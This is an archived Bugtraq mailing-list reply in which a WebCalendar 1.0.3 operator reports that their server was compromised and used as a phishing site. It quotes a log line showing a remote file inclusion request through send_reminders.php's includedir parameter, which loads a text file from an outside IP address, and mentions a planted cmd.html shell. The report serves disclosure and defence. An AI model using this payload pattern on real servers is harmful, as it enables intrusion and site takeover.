Re: WebCalendar-1.0.3 reading of any files

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: WebCalendar-1.0.3 reading of any files
From: webcalendar@xxxxxxxxxxxxxxx
Date: 29 Sep 2006 22:21:49 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

After finding these entries in the logfile and finding a cmd.html-file in this 
directory, I was disconnected because I was working as a phishing-site.

"POST 
/WebCalendar/tools/send_reminders.php?includedir=http://65.xxx.xx.xxx/dir/a.txt?
 HTTP/1.1" 200 7315

In other words, the attacker has improved his actions. 

More files are available on request.

Prev by Date: Portable shell-exploit for buffer-overflow bugs
Next by Date: Re: net2ftp: a web based FTP client :) <= Remote File Inclusion
Previous by thread: Re: WebCalendar-1.0.3 reading of any files
Next by thread: Open Searchable Image Catalogue: XSS and SQL Injection Vulnerabilities
Index(es):
- Date
- Thread